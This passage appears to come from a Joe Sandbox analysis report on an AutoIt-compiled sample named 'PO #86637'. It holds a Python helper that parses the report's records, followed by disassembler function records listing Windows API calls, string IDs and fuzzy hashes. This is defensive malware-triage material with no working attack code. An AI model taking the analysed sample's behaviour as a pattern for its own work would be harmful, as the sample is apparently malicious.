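        m = FIELD_RE.match(line)
        if m:
            key, val = m.groups()
            if key == "Source File":
                cur.source = val.split(",")[0]
            elif key == "API ID":
                cur.api_id = val
            elif key == "String ID":
                cur.strings = [s for s in val.split("$") if s]
            else:
                cur.fuzzy_hash = val
                records.append(cur)
                cur = FunctionRecord()
            continue
        m = API_RE.match(line)
        if m:
            cur.apis.append(m.groups())
    return records


def autoit_indicators(records):
    """Sorted, unique AutoIt3 runtime strings referenced anywhere in the records."""
    return sorted({s for r in records for s in r.strings if s in AUTOIT_MARKERS})


def callers_of(records, api_name):
    """(record index, call count) for every record that calls api_name."""
    counts = [(i, sum(1 for n, _, _ in r.apis if n == api_name)) for i, r in enumerate(records)]
    return [(i, c) for i, c in counts if c]


def decode_dump_name(name):
    """Base address, page protection and memory type encoded in a .sdmp file name."""
    parts = name.split(".")
    base, protect, mtype = (int(parts[i], 16) for i in (3, 4, 6))
    return {"base": base, "protect": PAGE_PROTECT.get(protect, hex(protect)),
            "type": MEM_TYPE.get(mtype, hex(mtype))}


if __name__ == "__main__":
    recs = parse_records(SAMPLE)
    print(f"{len(recs)} functions; AutoIt markers: {autoit_indicators(recs)}")
    for i, n in callers_of(recs, "AttachThreadInput"):
        print(f"record {i}: AttachThreadInput x{n}, region {decode_dump_name(recs[i].source)}")
```

Run against the full text of this section, the marker list alone is enough to classify the 00400000 image as the AutoIt stub, and `callers_of` pinpoints the focus-forcing routine (GetForegroundWindow plus paired AttachThreadInput calls) without reading every record by hand.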
                      APIs
                      • CreateMenu.USER32 ref: 00448603
                      • SetMenu.USER32(?,00000000), ref: 00448613
                      • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00448697
                      • IsMenu.USER32(?), ref: 004486AB
                      • CreatePopupMenu.USER32 ref: 004486B5
                      • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 004486EC
                      • DrawMenuBar.USER32 ref: 004486F5
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: Menu$CreateItem$DrawInfoInsertPopup
                      • String ID: 0
                      • API String ID: 161812096-4108050209
                      • Opcode ID: 5f9c542d8f07ae56d95057f828c3334b95156dd137b7db0efda9360fb5a3d221
                      • Instruction ID: 1651b4fd0bf3e4e6d8e032b2651979207be8780685d2f09cc615cc8e1c1775d8
                      • Opcode Fuzzy Hash: 5f9c542d8f07ae56d95057f828c3334b95156dd137b7db0efda9360fb5a3d221
                      • Instruction Fuzzy Hash: 9D418B75A01209AFEB40DF98D884ADEB7B4FF49314F10815EED189B340DB74A851CFA8
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: dfbce8e1a613c74e072c21ad89e7d3e14579d4917e2b3053f757fec35ca8a5d3
                      • Instruction ID: 0df76164974c5272bb459d6cb57aadea20bc0786d7edd9cc69ce034119999088
                      • Opcode Fuzzy Hash: dfbce8e1a613c74e072c21ad89e7d3e14579d4917e2b3053f757fec35ca8a5d3
                      • Instruction Fuzzy Hash: 10A1CE726083009FD310EF65D886B5BB3E9EBC4718F108E2EF559E7281D679E804CB96
                      APIs
                        • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,004A7F6C,0040F545,004A7F6C,004A90E8,004A7F6C,?,0040F545), ref: 0041013C
                        • Part of subcall function 00433998: GetFileAttributesW.KERNEL32(?), ref: 0043399F
                      • lstrcmpiW.KERNEL32(?,?), ref: 00453900
                      • MoveFileW.KERNEL32(?,?), ref: 00453932
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: File$AttributesFullMoveNamePathlstrcmpi
                      • String ID:
                      • API String ID: 978794511-0
                      • Opcode ID: e7576e1258f6bbb5b55b57ee2c4336deeb121e8720ac0ec1c8be93e036d3feb8
                      • Instruction ID: 27746a5f3a3ee1b1e58f24b17d6851fe0efcb48f315c8e59f2eb92c6bb7fc6f1
                      • Opcode Fuzzy Hash: e7576e1258f6bbb5b55b57ee2c4336deeb121e8720ac0ec1c8be93e036d3feb8
                      • Instruction Fuzzy Hash: 295155B2C0021996CF20EFA1DD45BEEB379AF44305F0445DEEA0DA3101EB79AB98CB55
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: dd945b6e1d8e8d9855cf24d2d3706bb91709aa24080d3beeb23df65cd9890c42
                      • Instruction ID: 5433ce91f60fc94fc18d391a2a535eeaa569d09d9a52eba385401fd30cec28f3
                      • Opcode Fuzzy Hash: dd945b6e1d8e8d9855cf24d2d3706bb91709aa24080d3beeb23df65cd9890c42
                      • Instruction Fuzzy Hash: 5B41C4322142405AF3619B6DFCC4BEBBB98FBA6324F10056FF185E55A0C3EA74C58769
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: ClearVariant
                      • String ID:
                      • API String ID: 1473721057-0
                      • Opcode ID: 3e0aaa4ed6ce8b6007e7bdda37da77eca1e161273c17b4dd860825949f7c6934
                      • Instruction ID: 82c0e5a8bed1f7f82a0371e607e4af2e63fad7cf90771a3a9635cac59f663638
                      • Opcode Fuzzy Hash: 3e0aaa4ed6ce8b6007e7bdda37da77eca1e161273c17b4dd860825949f7c6934
                      • Instruction Fuzzy Hash: C301ECB6000B486AD630E7B9DC84FD7B7ED6B85600F018E1DE69A82514DA75F188CB64
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: _memmove$_memcmp
                      • String ID: '$\$h
                      • API String ID: 2205784470-1303700344
                      • Opcode ID: b142f59b2296442f2f65cbc20b4c9604eb51a9c16c8aaf0febd8f469beae5ca2
                      • Instruction ID: e67660c870af743a7fabfec7c4e9e8b186464fd05e4f656457aecd1ba61caca8
                      • Opcode Fuzzy Hash: b142f59b2296442f2f65cbc20b4c9604eb51a9c16c8aaf0febd8f469beae5ca2
                      • Instruction Fuzzy Hash: 5CE1C070A002498FDB18CFA9D8806BEFBF2FF89304F28816ED84697341D778A945CB54
                      APIs
                      • VariantInit.OLEAUT32(00000000), ref: 0045EA56
                      • VariantCopy.OLEAUT32(00000000), ref: 0045EA60
                      • VariantClear.OLEAUT32 ref: 0045EA6D
                      • VariantTimeToSystemTime.OLEAUT32 ref: 0045EC06
                      • __swprintf.LIBCMT ref: 0045EC33
                      • VariantInit.OLEAUT32(00000000), ref: 0045ECEE
                      Strings
                      • %4d%02d%02d%02d%02d%02d, xrefs: 0045EC2D
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: Variant$InitTime$ClearCopySystem__swprintf
                      • String ID: %4d%02d%02d%02d%02d%02d
                      • API String ID: 2441338619-1568723262
                      • Opcode ID: 35eb9c3aeff660f135fd63a8918d5c45c4a90ea0b18b9c33d96ad8571bc730e4
                      • Instruction ID: 6ef9d3a4897ddb850998a39013325e9d2daf595bbef4806ea59c93c68b265cd6
                      • Opcode Fuzzy Hash: 35eb9c3aeff660f135fd63a8918d5c45c4a90ea0b18b9c33d96ad8571bc730e4
                      • Instruction Fuzzy Hash: F8A10873A0061487CB209F5AE48066AF7B0FF84721F1485AFED849B341C736AD99D7E5
                      APIs
                      • InterlockedIncrement.KERNEL32(004A7F04), ref: 0042C659
                      • InterlockedDecrement.KERNEL32(004A7F04), ref: 0042C677
                      • Sleep.KERNEL32(0000000A), ref: 0042C67F
                      • InterlockedIncrement.KERNEL32(004A7F04), ref: 0042C68A
                      • InterlockedDecrement.KERNEL32(004A7F04), ref: 0042C73C
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: Interlocked$DecrementIncrement$Sleep
                      • String ID: @COM_EVENTOBJ
                      • API String ID: 327565842-2228938565
                      • Opcode ID: 9e658ec2980077184a1632dd5c21727ba620fa2cdb3865c7e3de5124d93aa359
                      • Instruction ID: 079f2a2c733a9a3e151bbe14bd9981fb61a061d6167fc58a91b905d371dd4d86
                      • Opcode Fuzzy Hash: 9e658ec2980077184a1632dd5c21727ba620fa2cdb3865c7e3de5124d93aa359
                      • Instruction Fuzzy Hash: 18D1D271A002198FDB10EF94C985BEEB7B0FF45304F60856AE5057B392D778AE46CB98
                      APIs
                      • VariantClear.OLEAUT32(?), ref: 0047031B
                      • VariantClear.OLEAUT32(?), ref: 0047044F
                      • VariantInit.OLEAUT32(?), ref: 004704A3
                      • DispCallFunc.OLEAUT32(?,?,?,00000015,?,?,?,?), ref: 00470504
                      • VariantClear.OLEAUT32(?), ref: 00470516
                        • Part of subcall function 00435481: VariantCopy.OLEAUT32(?,?), ref: 00435492
                      • VariantCopy.OLEAUT32(?,?), ref: 0047057A
                        • Part of subcall function 00435403: VariantClear.OLEAUT32(?), ref: 00435414
                      • VariantClear.OLEAUT32(00000000), ref: 0047060D
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: Variant$Clear$Copy$CallDispFuncInit
                      • String ID: H
                      • API String ID: 3613100350-2852464175
                      • Opcode ID: f2b9533c7a0a825d738ebca76906f6301bd96a0988b7340563647801aa66eb79
                      • Instruction ID: 4e55d858753f5aac0b63ea9498fb9ef25a468b81cfd7169f1740116cc4944d08
                      • Opcode Fuzzy Hash: f2b9533c7a0a825d738ebca76906f6301bd96a0988b7340563647801aa66eb79
                      • Instruction Fuzzy Hash: 93B15BB5605311EFD710DF54C880A6BB3A4FF88308F049A2EFA8997351D738E951CB9A
                      APIs
                      • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00401D06
                      • DestroyWindow.USER32(?), ref: 00426F50
                      • UnregisterHotKey.USER32(?), ref: 00426F77
                      • FreeLibrary.KERNEL32(?), ref: 0042701F
                      • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00427050
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: Free$DestroyLibrarySendStringUnregisterVirtualWindow
                      • String ID: close all
                      • API String ID: 4174999648-3243417748
                      • Opcode ID: 4fd900de9a28da208b58a3ba22ecdd4c26f042792ef41b4fe823b5ed5eb78ac9
                      • Instruction ID: 89fc9d45334329c88beddca7a6314a06ce6e15860ee53b488cbf8147960762b2
                      • Opcode Fuzzy Hash: 4fd900de9a28da208b58a3ba22ecdd4c26f042792ef41b4fe823b5ed5eb78ac9
                      • Instruction Fuzzy Hash: 9BA1C174710212CFC710EF15C985B5AF3A8BF48304F5045AEE909672A2CB78BD96CF99
                      APIs
                      • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0044AAC5
                      • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0044AAFA
                      • InternetQueryOptionW.WININET(00000000,0000001F,00000000,00001000), ref: 0044AB5E
                      • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 0044AB74
                      • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0044AB83
                      • HttpQueryInfoW.WININET(00000000,00000005,?,00001000,00000000), ref: 0044ABBB
                        • Part of subcall function 004422CB: GetLastError.KERNEL32 ref: 004422E1
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: HttpInternet$OptionQueryRequest$ConnectErrorInfoLastOpenSend
                      • String ID:
                      • API String ID: 1291720006-3916222277
                      • Opcode ID: 91fdcc8e85295173cca015a6521aec32459a41892940df1d160b2f6c73229ea3
                      • Instruction ID: 89538bfc19842651326e528327905a39262a83d8aa3acd63c003c629d13479a9
                      • Opcode Fuzzy Hash: 91fdcc8e85295173cca015a6521aec32459a41892940df1d160b2f6c73229ea3
                      • Instruction Fuzzy Hash: FA51B1756403087BF710DF56DC86FEBB7A8FB88715F00851EFB0196281D7B8A5148BA8
                      APIs
                      • GetMenuItemInfoW.USER32(?,FFFFFFFF,00000000,00000030), ref: 0045FC48
                      • IsMenu.USER32(?), ref: 0045FC5F
                      • CreatePopupMenu.USER32 ref: 0045FC97
                      • GetMenuItemCount.USER32(?), ref: 0045FCFD
                      • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 0045FD26
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: Menu$Item$CountCreateInfoInsertPopup
                      • String ID: 0$2
                      • API String ID: 93392585-3793063076
                      • Opcode ID: f01c363b391305104942df3bb39f3e86dedaf87795108832ec1df4cdc4019c53
                      • Instruction ID: a5f6d3c146e885c54ead74f35c39eec4acd60bc9fc93d28bc39e3d14768ea649
                      • Opcode Fuzzy Hash: f01c363b391305104942df3bb39f3e86dedaf87795108832ec1df4cdc4019c53
                      • Instruction Fuzzy Hash: B55192719002099BDB11DF69D888BAF7BB4BB44319F14853EEC15DB282D3B8984CCB66
                      APIs
                      • SafeArrayAccessData.OLEAUT32(?,?), ref: 004352E6
                      • VariantClear.OLEAUT32(?), ref: 00435320
                      • SafeArrayUnaccessData.OLEAUT32(?), ref: 00435340
                      • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00435373
                      • VariantClear.OLEAUT32(?), ref: 004353B3
                      • SafeArrayUnaccessData.OLEAUT32(?), ref: 004353F6
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: ArrayDataSafeVariant$ClearUnaccess$AccessChangeType
                      • String ID: crts
                      • API String ID: 586820018-3724388283
                      • Opcode ID: 545d374044e3945891266c858ffc3b068b1e43ab9a1ba77500f3c10b34ab4cdf
                      • Instruction ID: e94501f388d0d73ced66c0aa9444ce68fa972137b9c89e1913ae9ea64c05cbbc
                      • Opcode Fuzzy Hash: 545d374044e3945891266c858ffc3b068b1e43ab9a1ba77500f3c10b34ab4cdf
                      • Instruction Fuzzy Hash: DE418BB5200208EBDB10CF1CD884A9AB7B5FF9C314F20852AEE49CB351E775E911CBA4
                      APIs
                        • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,004A7F6C,0040F545,004A7F6C,004A90E8,004A7F6C,?,0040F545), ref: 0041013C
                      • lstrcmpiW.KERNEL32(?,?), ref: 0044BC09
                      • MoveFileW.KERNEL32(?,?), ref: 0044BC3F
                      • _wcscat.LIBCMT ref: 0044BCAF
                      • _wcslen.LIBCMT ref: 0044BCBB
                      • _wcslen.LIBCMT ref: 0044BCD1
                      • SHFileOperationW.SHELL32(?), ref: 0044BD17
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: File_wcslen$FullMoveNameOperationPath_wcscatlstrcmpi
                      • String ID: \*.*
                      • API String ID: 2326526234-1173974218
                      • Opcode ID: dfa273c9728ae0aa44cf40aad3cddd2261aca17058b0337a789aafef13e29e40
                      • Instruction ID: cfb238852dc788c6f4e4306d35388aa956c556a9525b71239849112dc74cb112
                      • Opcode Fuzzy Hash: dfa273c9728ae0aa44cf40aad3cddd2261aca17058b0337a789aafef13e29e40
                      • Instruction Fuzzy Hash: 5C3184B1800219AACF14EFB1DC85ADEB3B5AF48304F5095EEE90997211EB35D748CB98
                      APIs
                        • Part of subcall function 00433244: _wcsncpy.LIBCMT ref: 0043325C
                      • _wcslen.LIBCMT ref: 004335F2
                      • GetFileAttributesW.KERNEL32(?), ref: 0043361C
                      • GetLastError.KERNEL32 ref: 0043362B
                      • CreateDirectoryW.KERNEL32(?,00000000), ref: 0043363F
                      • _wcsrchr.LIBCMT ref: 00433666
                        • Part of subcall function 004335CD: CreateDirectoryW.KERNEL32(?,00000000), ref: 004336A7
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: CreateDirectory$AttributesErrorFileLast_wcslen_wcsncpy_wcsrchr
                      • String ID: \
                      • API String ID: 321622961-2967466578
                      • Opcode ID: bb0dad1fe383a450cc5ca78da39c882eba2540a6c71c70dd25c8590f96c38e52
                      • Instruction ID: 66c6ecc179b40ab72a0151a8d865592f5e80cbeaaa2383c239fb12261b929cf9
                      • Opcode Fuzzy Hash: bb0dad1fe383a450cc5ca78da39c882eba2540a6c71c70dd25c8590f96c38e52
                      • Instruction Fuzzy Hash: C72129719013146ADF30AF25AC06BEB73AC9B05715F10569AFD18C2241E6799A888BE9
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
